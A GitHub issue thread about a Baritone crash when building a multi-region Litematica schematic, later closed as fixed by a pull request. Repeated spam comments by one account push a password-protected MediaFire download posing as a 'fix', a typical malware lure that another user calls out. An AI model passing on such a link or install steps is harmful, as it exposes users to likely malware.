### ISSUE TITLE
Crash upon attempting to build litematica multi region schematic.

### ISSUE THREAD

**Issue by varappdev** [cabaletta/baritone#4496] opened 2024-09-01 23:22 UTC
## Some information
Operating system: Linux
Java version: 21
Minecraft version: 1.21
Baritone version: 1.10.2
Other mods (if used): [modlist.md](https://github.com/user-attachments/files/16830797/modlist.md)

## Exception, error or logs
Please find your `latest.log` or `debug.log` in this folder and attach it to the issue

Linux: `~/.minecraft/logs/`
[2024-09-02-4.log.gz](https://github.com/user-attachments/files/16830798/2024-09-02-4.log.gz)

Windows: `%appdata%/.minecraft/logs/`

Mac: `/Library/Application\ Support/minecraft/logs/`

## How to reproduce
Add your steps to reproduce the issue/bug experienced here.

- Switch to normal selection mode in litematica.
- Create a multi subregion selection
- Save as schematic, even if it is air.
- Load and position schematic
- `#litematica`
- Crash

## Modified settings
To get the modified settings run `#modified` in game

```
All modified settings:
--
--
--
--
--
--
--
--
<< | >> 1/1
```

## Final checklist
- [x] I know how to properly use check boxes 
- [x] I have included the version of Minecraft I'm running, baritone's version and forge mods (if used).
- [x] I have included logs, exceptions and / or steps to reproduce the issue.
- [x] I have not used any OwO's or UwU's in this issue.

**Comment by goncastrum** [comment] 2024-09-01 23:26
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by VictorGamerLOL** [comment] 2024-09-01 23:28
> hi bro, to fix your trouble try this fix, i see it in another issue, https://app.mediafire.com/dqajf1x14ccfd password: changeme when you installing it, you need to place a check in install to path and select usx

may i know why its a mediafire link and why is it passworded?

**Comment by goncastrum** [comment] 2024-09-01 23:31
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by VictorGamerLOL** [comment] 2024-09-01 23:33
> hi bro, to fix your trouble try this fix, i see it in another issue, https://app.mediafire.com/dqajf1x14ccfd password: changeme when you installing it, you need to place a check in install to path and select usx

garbage bot distributing DLLs on a repo that is mainly java 💀

**Comment by goncastrum** [comment] 2024-09-01 23:33
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment] 2024-09-01 23:33
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment] 2024-09-01 23:34
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by ZacSharp** [comment] 2024-09-02 23:22
This looks like it's caused by a known problem in `LitematicaSchematic` and should be fixed by #4453 (which will reach the 1.21 branch soonish).

**Comment by Dtar380** [comment] 2024-10-17 16:53
When will this be solved?

**Comment by ZacSharp** [comment] 2024-11-09 16:24
Should be solved already

**Closed as completed by ZacSharp** 2024-11-09 16:24 UTC
Labels: bug
